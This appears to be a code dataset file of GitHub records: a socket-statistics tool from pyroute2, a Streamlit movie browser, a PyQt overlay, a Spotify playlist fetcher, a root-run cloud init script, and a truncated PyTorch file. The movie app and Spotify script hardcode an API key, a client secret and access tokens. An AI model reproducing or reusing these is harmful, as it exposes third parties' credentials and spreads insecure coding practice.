None),\n \"tcpi_notsent_bytes\": (\"notsent_bytes\", None),\n \"tcpi_rcv_mss\": (\"rcv_mss\", None),\n \"tcpi_pacing_rate\": (\"pacing_rate\", None),\n \"tcpi_retransmits\": (\"retransmits\", None),\n \"tcpi_min_rtt\": (\"min_rtt\", None),\n \"tcpi_rwnd_limited\": (\"rwnd_limited\", None),\n \"tcpi_max_pacing_rate\": (\"max_pacing_rate\", None),\n \"tcpi_probes\": (\"probes\", None),\n \"tcpi_reordering\": (\"reordering\", None),\n \"tcpi_last_data_recv\": (\"last_data_recv\", None),\n \"tcpi_bytes_received\": (\"bytes_received\", None),\n \"tcpi_fackets\": (\"fackets\", None),\n \"tcpi_last_ack_recv\": (\"last_ack_recv\", None),\n \"tcpi_last_ack_sent\": (\"last_ack_sent\", None),\n \"tcpi_unacked\": (\"unacked\", None),\n \"tcpi_sacked\": (\"sacked\", None),\n \"tcpi_bytes_acked\": (\"bytes_acked\", None),\n \"tcpi_delivery_rate_app_limited\": (\n \"delivery_rate_app_limited\",\n None,\n ),\n \"tcpi_delivery_rate\": (\"delivery_rate\", None),\n \"tcpi_sndbuf_limited\": (\"sndbuf_limited\", None),\n \"tcpi_ca_state\": (\"ca_state\", None),\n \"tcpi_busy_time\": (\"busy_time\", None),\n \"tcpi_total_retrans\": (\"total_retrans\", None),\n \"tcpi_advmss\": (\"advmss\", None),\n \"tcpi_backoff\": (None, None),\n 
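# tcp_vegas fields below are read by rtt_p_cb from ctx['raw'], so the refined dict skips them\n 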
\"tcpv_enabled\": (None, \"skip\"),\n \"tcpv_rttcnt\": (None, \"skip\"),\n \"tcpv_rtt\": (None, \"skip\"),\n \"tcpv_minrtt\": (None, \"skip\"),\n # BBR\n \"bbr_bw_lo\": (\"bbr_bw_lo\", None),\n \"bbr_bw_hi\": (\"bbr_bw_hi\", None),\n \"bbr_min_rtt\": (\"bbr_min_rtt\", None),\n \"bbr_pacing_gain\": (\"bbr_pacing_gain\", None),\n \"bbr_cwnd_gain\": (\"bbr_cwnd_gain\", None),\n # DCTCP\n \"dctcp_enabled\": (\"dctcp_enabled\", None),\n \"dctcp_ce_state\": (\"dctcp_ce_state\", None),\n \"dctcp_alpha\": (\"dctcp_alpha\", None),\n \"dctcp_ab_ecn\": (\"dctcp_ab_ecn\", None),\n \"dctcp_ab_tot\": (\"dctcp_ab_tot\", None),\n }\n k_idx = 0\n cb_idx = 1\n\n info_k = \"tcp_info\"\n vessel[info_k] = {}\n\n # BUG - pyroute2 diag - seems always last info instance from kernel\n if type(tcp_info_raw) != str:\n for k, v in tcp_info_raw.items():\n if k not in info_refine_tabl:\n continue\n refined_k = info_refine_tabl[k][k_idx]\n cb = info_refine_tabl[k][cb_idx]\n refined_v = v\n if cb and cb == \"skip\":\n continue\n elif cb:\n ctx = {\"raw\": tcp_info_raw}\n refined_v = cb(k, v, **ctx)\n\n vessel[info_k][refined_k] = refined_v\n\n return vessel\n\n\ndef prepare_args():\n parser = argparse.ArgumentParser(\n description=\"\"\"\n ss2 - socket statistics depictor meant as\n a complete and convenient surrogate for\n iproute2/misc/ss2\"\"\"\n )\n parser.add_argument(\n \"-x\",\n \"--unix\",\n help=\"Display Unix domain sockets.\",\n action=\"store_true\",\n )\n parser.add_argument(\n \"-t\", \"--tcp\", help=\"Display TCP sockets.\", action=\"store_true\"\n )\n parser.add_argument(\n \"-l\",\n \"--listen\",\n help=\"Display listening sockets.\",\n action=\"store_true\",\n )\n parser.add_argument(\n \"-a\", \"--all\", help=\"Display all sockets.\", action=\"store_true\"\n )\n parser.add_argument(\n \"-p\",\n \"--process\",\n help=\"show socket holding context\",\n action=\"store_true\",\n )\n parser.add_argument(\n \"-r\",\n \"--resolve\",\n help=\"resolve host names in addition\",\n action=\"store_true\",\n )\n\n args = parser.parse_args()\n\n return args\n\n\ndef run(args=None):\n if psutil is None:\n raise RuntimeError(\"ss2 requires python-psutil >= 5.0 to run\")\n\n if not args:\n args = prepare_args()\n\n _states = SS_CONN\n if args.listen:\n _states = 1 << SS_LISTEN\n if args.all:\n _states = SS_ALL\n\n protocols = []\n if args.tcp:\n protocols.append(TCP(sk_states=_states))\n\n if args.unix:\n protocols.append(UNIX(sk_states=_states))\n\n if not protocols:\n raise RuntimeError(\"not implemented - ss2 in fledging mode\")\n\n _user_ctxt_map = None\n if args.process:\n _user_ctxt_map = UserCtxtMap()\n\n with DiagSocket() as ds:\n ds.bind()\n for p in protocols:\n p(ds, args, _user_ctxt_map)\n\n\nif __name__ == \"__main__\":\n run()\n", "repo_name": "svinota/pyroute2", "sub_path": "pyroute2/netlink/diag/ss2.py", "file_name": "ss2.py", "file_ext": "py", "file_size_in_byte": 18071, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 888, "dataset": "github-code", "pt": "61", "api": [{"api_name": "collections.Mapping", "line_number": 41, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 44, "usage_type": "call"}, {"api_name": "os.readlink", "line_number": 54, "usage_type": "call"}, {"api_name": "psutil.net_connections", "line_number": 124, "usage_type": "call"}, {"api_name": "psutil.Process", "line_number": 126, "usage_type": "call"}, {"api_name": "psutil.NoSuchProcess", "line_number": 136, "usage_type": "attribute"}, {"api_name": "collections.Callable", "line_number": 159, 
"usage_type": "name"}, {"api_name": "socket.gethostbyaddr", "line_number": 164, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 181, "usage_type": "call"}, {"api_name": "pyroute2.netlink.diag.SS_CONN", "line_number": 185, "usage_type": "name"}, {"api_name": "socket.AF_UNIX", "line_number": 191, "usage_type": "name"}, {"api_name": "pyroute2.netlink.diag.UDIAG_SHOW_NAME", "line_number": 192, "usage_type": "name"}, {"api_name": "pyroute2.netlink.diag.UDIAG_SHOW_VFS", "line_number": 192, "usage_type": "name"}, {"api_name": "pyroute2.netlink.diag.UDIAG_SHOW_PEER", "line_number": 192, "usage_type": "name"}, {"api_name": "pyroute2.netlink.diag.SS_CONN", "line_number": 255, "usage_type": "name"}, {"api_name": "socket.AF_INET", "line_number": 271, "usage_type": "name"}, {"api_name": "pyroute2.netlink.diag.SS_ESTABLISHED", "line_number": 394, "usage_type": "name"}, {"api_name": "pyroute2.netlink.diag.SS_SYN_SENT", "line_number": 395, "usage_type": "name"}, {"api_name": "pyroute2.netlink.diag.SS_SYN_RECV", "line_number": 396, "usage_type": "name"}, {"api_name": "pyroute2.netlink.diag.SS_FIN_WAIT1", "line_number": 397, "usage_type": "name"}, {"api_name": "pyroute2.netlink.diag.SS_FIN_WAIT2", "line_number": 398, "usage_type": "name"}, {"api_name": "pyroute2.netlink.diag.SS_TIME_WAIT", "line_number": 399, "usage_type": "name"}, {"api_name": "pyroute2.netlink.diag.SS_CLOSE", "line_number": 400, "usage_type": "name"}, {"api_name": "pyroute2.netlink.diag.SS_CLOSE_WAIT", "line_number": 401, "usage_type": "name"}, {"api_name": "pyroute2.netlink.diag.SS_LAST_ACK", "line_number": 402, "usage_type": "name"}, {"api_name": "pyroute2.netlink.diag.SS_LISTEN", "line_number": 403, "usage_type": "name"}, {"api_name": "pyroute2.netlink.diag.SS_CLOSING", "line_number": 404, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 532, "usage_type": "call"}, {"api_name": "pyroute2.netlink.diag.SS_CONN", "line_number": 581, "usage_type": "name"}, {"api_name": "pyroute2.netlink.diag.SS_LISTEN", "line_number": 583, "usage_type": "name"}, {"api_name": "pyroute2.netlink.diag.SS_ALL", "line_number": 585, "usage_type": "name"}, {"api_name": "pyroute2.netlink.diag.DiagSocket", "line_number": 601, "usage_type": "call"}]} +{"seq_id": "73201168193", "text": "import streamlit as st\nimport pandas as pd\nimport numpy as np\nimport requests as requests\n\nst.write(\"Top Movies \")\n\n\n# DATE_COLUMN = 'date/time'\n# DATA_URL = ('https://s3-us-west-2.amazonaws.com/'\n# 'streamlit-demo-data/uber-raw-data-sep14.csv.gz')\n\n\n# @st.cache\n# def load_data(nrows):\n# data = pd.read_csv(DATA_URL, nrows=nrows)\n# def lowercase(x): return str(x).lower()\n# data.rename(lowercase, axis='columns', inplace=True)\n# data[DATE_COLUMN] = pd.to_datetime(data[DATE_COLUMN])\n# return data\n\n\n# data_load_state = st.text('Loading data...')\n# data = load_data(10000)\n# data_load_state.text(\"Done! 
(using st.cache)\")\n\n# if st.checkbox('Show raw data'):\n# st.subheader('Raw data')\n# st.write(data)\n\n# st.subheader('Number of pickups by hour')\n# hist_values = np.histogram(\n# data[DATE_COLUMN].dt.hour, bins=24, range=(0, 24))[0]\n# st.bar_chart(hist_values)\n\n# # Some number in the range 0-23\n# hour_to_filter = st.slider('hour', 0, 23, 17)\n# filtered_data = data[data[DATE_COLUMN].dt.hour == hour_to_filter]\n\n# st.subheader('Map of all pickups at %s:00' % hour_to_filter)\n# st.map(filtered_data)\n\n\n\n# fetch movies list from the API\nresponse = requests.get(\n 'https://api.themoviedb.org/3/movie/popular?api_key=d9604e1674b0955abd840336ad75a8e5&language=en-US&page=1')\nmovies = response.json()['results']\n\n# get movie genres\ngenre_response = requests.get(\n 'https://api.themoviedb.org/3/genre/movie/list?api_key=d9604e1674b0955abd840336ad75a8e5&language=en-US')\ngenres = genre_response.json()['genres']\n\n\n# build a dictionary of genres\ngenres_dict = {}\nfor genre in genres:\n genres_dict[genre['id']] = genre['name']\n\n\n# create sidebar with movie genre selection\ngenre_list = list(genres_dict.values())\nselected_genre = st.sidebar.multiselect('Genre', genre_list)\n\n\n\n# display top movie as hero banner\n\n# st.write(\"Trending Movie \")\n# st.title(movies[0]['title'])\n# st.markdown('**Popularity:** ' + str(movies[0]['popularity']))\n# st.markdown('**Vote Average:** ' + str(movies[0]['vote_average']))\n# st.markdown('**Release Date:** ' + str(movies[0]['release_date']))\n# st.markdown('**Overview:** ' + str(movies[0]['overview']))\n# st.image('https://image.tmdb.org/t/p/w500' + movies[0]['poster_path'])\n\n# filter movies by selected genre in one line \n@st.cache\ndef filter_movies(movies, genres):\n filtered_movies = []\n for movie in movies:\n movie_genre_ids = movie['genre_ids']\n movie_genres = []\n for genre_id in movie_genre_ids:\n movie_genres.append(genres_dict[genre_id])\n if set(movie_genres).intersection(set(genres)):\n filtered_movies.append(movie)\n return filtered_movies\n\n\ndata_load_state = st.text('Loading data...')\n\n\n# display movies with image, title and genre as small cards in one line\nif selected_genre:\n movies = filter_movies(movies, selected_genre)\nfor movie in movies:\n col1, col2, col3 = st.columns(3)\n with col1:\n st.write(movie['title'])\n st.image('https://image.tmdb.org/t/p/w500' +\n movie['poster_path'])\n\n \n \n with col2:\n st.write(movie['overview'])\n\n# display movie trailers on button click\n\n\n if st.button('Trailer', key=movie['id']):\n trailer_response = requests.get('https://api.themoviedb.org/3/movie/' + str(movie['id']) + '/videos?api_key=d9604e1674b0955abd840336ad75a8e5&language=en-US')\n trailer = trailer_response.json()['results'][0]\n st.video('https://www.youtube.com/watch?v=' + trailer['key'])\n\n\n\n\n\n\n# dislay movie per genre\n# for genre in selected_genre:\n# st.write(genre)\n# for movie in movies:\n# movie_genre_ids = movie['genre_ids']\n# movie_genres = []\n# for genre_id in movie_genre_ids:\n# movie_genres.append(genres_dict[genre_id])\n# if genre in movie_genres:\n# st.write(movie['title'])\n# st.image('https://image.tmdb.org/t/p/w500' + movie['poster_path'])\n# st.write(movie['overview'])\n# st.write(movie['release_date'])\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n \n\n\n\n\n\n\n\n\n\n# # create a list of movie titles and images for each movie\n# movie_titles = [movie['title'] for movie in movies]\n# movie_images = [movie['poster_path'] for movie in movies]\n\n# # create a dictionary of movie 
titles and images\n# movie_dict = dict(zip(movie_titles, movie_images))\n\n# # display the movie titles as a dropdown\n# movie = st.selectbox('Select a movie', movie_titles)\n\n# # display the movie image\n# st.image('https://image.tmdb.org/t/p/w500/' + movie_dict[movie])\n\n\n# # create a sidebar of movie titles and images\n# st.sidebar.header('Top Movies')\n# for movie in movies:\n# st.sidebar.image('https://image.tmdb.org/t/p/w500/' + movie['poster_path'], width=100)\n# st.sidebar.write(movie['title'])\n\n\n\n\n# # go through the list and display movies as cards in a grid columns and make them clickable\n# for movie in movies:\n# col1, col2, col3 = st.columns(3)\n# with col1:\n# st.image('https://image.tmdb.org/t/p/w500/' + movie['poster_path'])\n# with col2:\n# st.write(movie['title'])\n# with col3:\n# st.write(movie['overview'])\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n", "repo_name": "dev-ted/steamlit-movie-app", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 5435, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "streamlit.write", "line_number": 6, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 46, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 51, "usage_type": "call"}, {"api_name": "streamlit.sidebar.multiselect", "line_number": 64, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 64, "usage_type": "attribute"}, {"api_name": "streamlit.cache", "line_number": 79, "usage_type": "attribute"}, {"api_name": "streamlit.text", "line_number": 92, "usage_type": "call"}, {"api_name": "streamlit.columns", "line_number": 99, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 101, "usage_type": "call"}, {"api_name": "streamlit.image", "line_number": 102, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 108, "usage_type": "call"}, {"api_name": "streamlit.button", "line_number": 113, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 114, "usage_type": "call"}, {"api_name": "streamlit.video", "line_number": 116, "usage_type": "call"}]} +{"seq_id": "23911314812", "text": "from PyQt6.QtWidgets import QWidget, QLabel, QVBoxLayout, QHBoxLayout, QGraphicsOpacityEffect\r\nfrom PyQt6.QtCore import *\r\nfrom PyQt6.QtGui import QFont\r\nfrom BlurWindow.blurWindow import GlobalBlur\r\nfrom .. import storage\r\nfrom . 
import app\r\n\r\n\r\nclass Window(QWidget):\r\n def __init__(self):\r\n super(Window, self).__init__()\r\n conf = storage.setting['mouse']\r\n size = app.primaryScreen().size()\r\n\r\n self.setWindowTitle('Visualizer')\r\n self.setWindowFlags(\r\n Qt.WindowType.Tool |\r\n Qt.WindowType.X11BypassWindowManagerHint |\r\n Qt.WindowType.CustomizeWindowHint |\r\n Qt.WindowType.WindowStaysOnTopHint |\r\n Qt.WindowType.FramelessWindowHint\r\n )\r\n self.setAttribute(Qt.WidgetAttribute.WA_TranslucentBackground)\r\n self.setAttribute(Qt.WidgetAttribute.WA_TransparentForMouseEvents, True)\r\n self.setAttribute(Qt.WidgetAttribute.WA_NoChildEventsForParent, True)\r\n GlobalBlur(self.winId(), Dark=True, QWidget=self)\r\n\r\n\r\nGUI = Window()\r\n", "repo_name": "ltndat/key-cast-visualizer", "sub_path": "app/ui/mouse.py", "file_name": "mouse.py", "file_ext": "py", "file_size_in_byte": 992, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "PyQt6.QtWidgets.QWidget", "line_number": 9, "usage_type": "name"}, {"api_name": "BlurWindow.blurWindow.GlobalBlur", "line_number": 26, "usage_type": "call"}]} +{"seq_id": "13383015207", "text": "from contextlib import nullcontext\nimport copy\nfrom distutils.log import error\nfrom pyexpat.model import XML_CTYPE_ANY\nimport sqlite3\nfrom textwrap import indent\nfrom xml.etree.ElementTree import tostring\n# from flask import Flask\n# import sqlalchemy\nimport pandas as pd \n# from sqlalchemy.orm import sessionmaker\nimport requests\nimport json\nfrom datetime import datetime\nimport datetime\n# from keyvalue_sqlite import KeyValueSqlite\nimport base64\n\nCLIENT_ID = \"7ece4bb7979f433ab4a0a604bc2f97b5\"\nCLIENT_SECRET = \"3e59cc5912dc4a47b39f7fc2db529366\"\n\nDATABASE_LOCATION = \"sqlite:///my_playlists.sqlite\"\nUSER_ID = \"22io3oxgaphrgsxto4naqh4ai\"\n\n# Get New ID here -> https://developer.spotify.com/console/get-playlists/\nUSER_PLAYLISTS_TOKEN = \"BQBkjR6NT3Stt-8SxTmWs_-86SAnegsLlLpEytdJhK4SjxyY5r8s5RPr9qhlDA3ONG8HyXACdhEdWyFzY6NiuFkMzLu9wzMBVaLYe53LgJLiqTT8_5lFtf7LhCkMzBkiZ0cQDw8P5UTP3sG3jtxr6ioPnOvz4jIXIHt711Smx51ZctObCf4jCJVaMnfwpndneHLOWh5JRkDb_ukH_2c\"\n\n# Get New ID here -> https://developer.spotify.com/console/get-playlist-tracks/\nPLAYLISTS_TOKEN = \"BQD-X2c9Lob2zOuha2mJ_e1SXHe1CKaFpQ9DuM20QyRsccUwfXn4L8URLlaaO351jJdVfDYX2I2OGuVmsG-n8eBsCFm9TVuf_ksEDuQeTrSd3X9siWLDDiciXlYWXTvNr9PNq2oFCgHNJzw2Uu9pga2FI3rohOzDx0hzNqhT65MTJ5xzZGdjWaS_DLEbGeK5erYr8Owq014qaYq3\"\n\n# Get New ID here -> https://developer.spotify.com/console/get-playlist-tracks/\nPLAYLIST_ITEMS_TOKEN = \"\"\n\ndef getAccessToken(clientID, clientSecret):\n client_id_and_secret = '{client_id}:{client_secret}'.format(client_id=clientID, client_secret=clientSecret)\n client_data = base64.urlsafe_b64encode(client_id_and_secret.encode()).decode()\n\n endpoint = \"https://accounts.spotify.com/api/token\"\n headers = {'Content-Type': 'application/x-www-form-urlencoded',\n 'Authorization': 'Basic {}'.format(client_data)}\n payload = {'grant_type': 'client_credentials'}\n access_token_request = requests.post(endpoint, headers=headers, data=payload)\n\n responseObject = access_token_request.json()\n access_token = responseObject['access_token']\n\n return access_token\n\n# def apiGetSpotify(ep):\n# access_token = getAccessToken(CLIENT_ID, CLIENT_SECRET)\n# if ep.startswith(\"https://\"):\n# endpoint = ep\n# else:\n# endpoint = 'https://api.spotify.com/v1/' + ep\n\n# headers = {'Authorization': 'Bearer ' + access_token}\n\n# 
try:\n# response = requests.get(endpoint, headers=headers, verify=False)\n# except Exception as ex:\n# print(\"err - common.py - apiGetSpotify3 --> \" + str(type(ex)) + \" - \" + str(ex.args) + \" - \" + str(ex))\n# return ''\n# return response.json()\n\n# def check_if_valid_data(df: pd.DataFrame) -> bool:\n# # Check if dataframe is empty\n# if df.empty:\n# print(\"No playlists downloaded. Finishing execution\")\n# return False \n\n# # Primary Key Check\n# if pd.Series(df['played_at']).is_unique:\n# pass\n# else:\n# raise Exception(\"Primary Key check is violated\")\n\n# # Check for nulls\n# if df.isnull().values.any():\n# raise Exception(\"Null values found\")\n\n# # # Check that all timestamps are of yesterday's date\n# # yesterday = datetime.datetime.now() - datetime.timedelta(days=1)\n# # yesterday = yesterday.replace(hour=0, minute=0, second=0, microsecond=0)\n\n# # timestamps = df[\"timestamp\"].tolist()\n# # for timestamp in timestamps:\n# # if datetime.datetime.strptime(timestamp, '%Y-%m-%d') != yesterday:\n# # raise Exception(\"At least one of the returned playlists does not have a yesterday's timestamp\")\n# return True\n\ndef getLikedTracks(token, id):\n offset = 0\n tracks = {}\n while offset < 10000:\n endpoint = \"https://api.spotify.com/v1/playlists/{playlist_id}/tracks?offset={offset}&limit=10\".format(playlist_id = id, offset = offset)\n headers = {\n \"Accept\" : \"application/json\",\n \"Authorization\" : \"Bearer {token}\".format(token=token),\n \"Content-Type\" : \"application/json\"}\n\n user_playlists_request = requests.get(endpoint, headers = headers)\n user_playlists = user_playlists_request.json()\n for track in range(0, len(user_playlists)):\n try:\n tracks.update({user_playlists['items'][track]['track'][\"id\"] : user_playlists['items'][track]['track'][\"name\"]}) # TRACK_NAME : TRACK_ID\n except IndexError: break\n else: continue\n offset += 10\n return tracks\n\nLIKED_TRACKS = getLikedTracks(PLAYLISTS_TOKEN, \"2OoFqFk4QYnb6DFwifnqlG\") \n\ndef getTracks(token, id):\n offset = 0\n tracks = {}\n while offset < 100:\n endpoint = \"https://api.spotify.com/v1/playlists/{playlist_id}/tracks?offset={offset}&limit=10\".format(playlist_id = id, offset = offset)\n headers = {\n \"Accept\" : \"application/json\",\n \"Authorization\" : \"Bearer {token}\".format(token=token),\n \"Content-Type\" : \"application/json\"}\n\n user_playlists_request = requests.get(endpoint, headers = headers)\n user_playlists = user_playlists_request.json()\n for track in range(0, len(user_playlists)):\n try:\n if user_playlists['items'][track]['track'][\"id\"] not in LIKED_TRACKS.keys():\n tracks.update({user_playlists['items'][track]['track'][\"id\"] : user_playlists['items'][track]['track'][\"name\"]}) # TRACK_NAME : TRACK_ID\n except IndexError: break\n else: continue\n offset += 10\n return tracks\n\n\n# TODO: need to find away to access user Liked Songs playlist\n# def getPlaylistItems(id):\n# endpoint = \"https://api.spotify.com/v1/{playlist_id}/tracks?offset=0&limit=50\".format(playlist_id = id)\n# headers = {\n# \"Accept\" : \"application/json\",\n# \"Authorization\" : \"Bearer {token}\".format(token=token),\n# \"Content-Type\" : \"application/json\"\n# }\n# user_playlists_request = requests.get(endpoint, headers = headers)\n\n# user_playlists = user_playlists_request.json()\n\n# return user_playlists\n\n# def getTracksFromLikedList():\n# print(\"msg - common.py - getTracksFromLikedList --> requesting tracks from liked list.\") \n# liked_tracks = 
apiGetSpotify(\"me/tracks?offset=0&limit=50\")\n\n \n# '''--> check response before continuing'''\n# if liked_tracks == '':\n# print(\"err - common.py - getTracksFromLikedList2 --> empty api response for liked tracks!\")\n# return ''\n\n\n# try:\n# '''--> check pagination - fill resultlist'''\n# resultList = []\n# total = liked_tracks[\"total\"]\n# limit = liked_tracks[\"limit\"]\n# offset = liked_tracks[\"offset\"]\n\n# while offset < total:\n# for track in liked_tracks[\"items\"]:\n# if track[\"track\"][\"id\"]: #check if valid item\n# resultList.append(track[\"track\"][\"id\"]) #add track ID to resultList\n# offset = offset + limit\n# if offset < total: #new request\n# liked_tracks = apiGetSpotify(\"me/tracks?offset=\" + str(offset) + \"&limit=\" + str(limit))\n# if liked_tracks == '': #invalid api response\n# print(\"err - common.py - getTracksFromLikedList3 --> empty api response for liked tracks!\")\n# return ''\n# continue\n\n# print(\"msg - common.py - getTracksFromLikedList4 --> Succesfully returned list of \" + str(len(resultList)) + \" tracks from liked list.\")\n# return resultList\n\n# except Exception as ex:\n# print(\"err - common.py - getTracksFromLikedList5 --> \" + str(type(ex)) + \" - \" + str(ex.args) + \" - \" + str(ex))\n# return ''\n\ndef getUserPlaylists(token, id):\n endpoint = \"https://api.spotify.com/v1/users/{user_id}/playlists/\".format(user_id = id)\n headers = {\n \"Accept\" : \"application/json\",\n \"Content-Type\" : \"application/json\",\n \"Authorization\" : \"Bearer {token}\".format(token=token)\n }\n\n user_playlists_request = requests.get(endpoint, headers = headers)\n user_playlists = user_playlists_request.json()\n\n mixtape_choices = [\"Daily Mix 1\", \"Daily Mix 2\", \"Daily Mix 3\", \"Daily Mix 4\", \"Daily Mix 5\", \"Daily Mix 6\", \"Discover Weekly\", \"Release Radar\"]\n playlist_titles = {}\n for title in range(0, len(user_playlists['items'])) : \n if user_playlists['items'][title][\"name\"] in mixtape_choices:\n playlist_titles.update({user_playlists['items'][title][\"id\"] : user_playlists['items'][title][\"name\"]}) # PLAYLIST_ID : PLAYLIST_NAME\n playlist_dict = {}\n for playlist in range(0, len(playlist_titles)) :\n tracks = getTracks(PLAYLISTS_TOKEN, list(playlist_titles.keys())[playlist]) \n playlist_dict.update({playlist : {\"id\":list(playlist_titles.keys())[playlist], \"name\":list(playlist_titles.values())[playlist], \"tracks\":tracks}}) \n # INDEX : {\n # TRACK_ID : \n # TRACK_NAME :\n # TRACK_TRACKS : {Track_ID : track_title}}\n \n return json.dumps(playlist_dict, indent = 4)\n\n\nif __name__ == \"__main__\":\n print(getUserPlaylists(USER_PLAYLISTS_TOKEN, USER_ID))\n # print(getTracks(PLAYLISTS_TOKEN, \"2OoFqFk4QYnb6DFwifnqlG\"))\n # print(getTracksFromLikedList())\n # print(getAccessToken(CLIENT_ID, CLIENT_SECRET))\n # playlist_url = []\n \n\n # # Extracting only the relevant bits of data from the json object \n # for playlist in data:\n # playlist_id.append(playlist[\"items\"][\"id\"])\n # playlist_names.append(playlist[\"items\"][0][\"name\"])\n # playlist_url.append(playlist[\"items\"][0][\"external_urls\"][\"spotify\"])\n # tracks[playlist].append(playlist[\"items\"][0][\"tracks\"][\"name\"])\n \n \n # # Prepare a dictionary in order to turn it into a pandas dataframe below \n # playlist_dict = {\n # \"playlist_id\" : playlist_id,\n # \"playlist_name\" : playlist_names,\n # \"playlist_url\" : playlist_url,\n # \"tracks\": tracks\n # }\n\n # playlist_df = pd.DataFrame(playlist_dict, columns = [\"playlist_id\", 
\"playlist_name\", \"playlist_url\", \"tracks\"])\n \n # print(playlist_df)\n\n # # Validate\n # if check_if_valid_data(playlist_df):\n # print(\"Data valid, proceed to Load stage\")\n\n # # engine = sqlalchemy.create_engine(DATABASE_LOCATION)\n # conn = sqlite3.connect('my_playlists.sqlite')\n # # cursor = conn.cursor()\n\n # # sql_query = \"\"\"\n # # CREATE TABLE IF NOT EXISTS my_playlists(\n # # playlist_name VARCHAR(200),\n # # artist_name VARCHAR(200),\n # # played_at VARCHAR(200),\n # # timestamp VARCHAR(200),\n # # CONSTRAINT primary_key_constraint PRIMARY KEY (played_at)\n # # )\n # # \"\"\"\n\n # # sql_query_two = \"\"\"insert or replace into my_playlists (playlist_name,artist_name,played_at,timestamp) values (?,?,?)\"\"\"\n\n # # cursor.execute(sql_query)\n # # cursor.execute(sql_query_two)\n\n # print(\"Opened database successfully\")\n\n # try:\n # playlist_df.to_sql(\"my_playlists\", conn, index=False, if_exists='replace')\n # except:\n # print(\"Data already exists in the database\")\n\n # # df = pd.read_sql_query('SELECT * FROM my_playlists', conn, parse_dates=[\"playlist_name\"])\n\n # conn.close()\n # print(\"Close database successfully\")\n # print(df.head)\n \n # Job scheduling \n# def gettrackAudioFeatures(token, ids):\n# endpoint = \"https://api.spotify.com/v1/audio-features?ids={ids}\"\n# getHeader = {\n# \"Accept\" : \"application/json\",\n# \"Content-Type\" : \"application/json\",\n# \"Authorization\" : \"Bearer {token}\".format(token=token)\n# }\n\n# res = requests.get(endpoint, headers=getHeader)\n# track_features = res.json()\n \n# return track_features", "repo_name": "NoelBram/mySpotify", "sub_path": "database/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 11727, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "base64.urlsafe_b64encode", "line_number": 36, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 42, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 101, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 123, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 194, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 211, "usage_type": "call"}]} +{"seq_id": "72313973953", "text": "#!/usr/bin/env python\nimport syslog\nfrom user_data import get_user_data\nimport tempfile\nfrom subprocess import call\nimport os\nimport stat\n\n# Pull the init script out of user data if it exists\nuser_data = get_user_data()\n\nif not user_data.get('init'):\n syslog.syslog(syslog.LOG_WARNING, 'Skipping init script (non-given)...')\n exit(0)\n\ninit_script = user_data['init'].lstrip()\n\nif not init_script.startswith('#!'):\n syslog.syslog(syslog.LOG_WARNING, 'Skipping init script (does not start with shebang #!)...')\n exit(0)\n\nscript_file = tempfile.NamedTemporaryFile(delete=False)\n\ntry:\n script_file.write(init_script)\n script_file.close()\n os.chmod(script_file.name, stat.S_IXUSR | stat.S_IRUSR)\n\n # We have the file, now let's run it\n syslog.syslog(syslog.LOG_WARNING, 'Running init script (%s)...' 
% script_file.name)\n \n # Note, this runs as root\n if call([script_file.name]) != 0:\n syslog.syslog(syslog.LOG_WARNING, \"Failed to successfully run init script\")\n else:\n syslog.syslog(syslog.LOG_WARNING, 'Init script run successfully')\nfinally:\n os.remove(script_file.name)\n", "repo_name": "hayesgm/cerberus", "sub_path": "scripts/cerberus_user_init.py", "file_name": "cerberus_user_init.py", "file_ext": "py", "file_size_in_byte": 1114, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "user_data.get_user_data", "line_number": 10, "usage_type": "call"}, {"api_name": "user_data.get", "line_number": 12, "usage_type": "call"}, {"api_name": "syslog.syslog", "line_number": 13, "usage_type": "call"}, {"api_name": "syslog.LOG_WARNING", "line_number": 13, "usage_type": "attribute"}, {"api_name": "syslog.syslog", "line_number": 19, "usage_type": "call"}, {"api_name": "syslog.LOG_WARNING", "line_number": 19, "usage_type": "attribute"}, {"api_name": "tempfile.NamedTemporaryFile", "line_number": 22, "usage_type": "call"}, {"api_name": "os.chmod", "line_number": 27, "usage_type": "call"}, {"api_name": "stat.S_IXUSR", "line_number": 27, "usage_type": "attribute"}, {"api_name": "stat.S_IRUSR", "line_number": 27, "usage_type": "attribute"}, {"api_name": "syslog.syslog", "line_number": 30, "usage_type": "call"}, {"api_name": "syslog.LOG_WARNING", "line_number": 30, "usage_type": "attribute"}, {"api_name": "subprocess.call", "line_number": 33, "usage_type": "call"}, {"api_name": "syslog.syslog", "line_number": 34, "usage_type": "call"}, {"api_name": "syslog.LOG_WARNING", "line_number": 34, "usage_type": "attribute"}, {"api_name": "syslog.syslog", "line_number": 36, "usage_type": "call"}, {"api_name": "syslog.LOG_WARNING", "line_number": 36, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 38, "usage_type": "call"}]} +{"seq_id": "21260325192", "text": "import numpy as np\nimport torch, torchvision\nfrom torch import nn\nimport datetime\nfrom tqdm import tqdm\nfrom torchvision import datasets, transforms\nfrom torch.utils.data import DataLoader, TensorDataset\nfrom os import listdir\nfrom data.MyDataset import 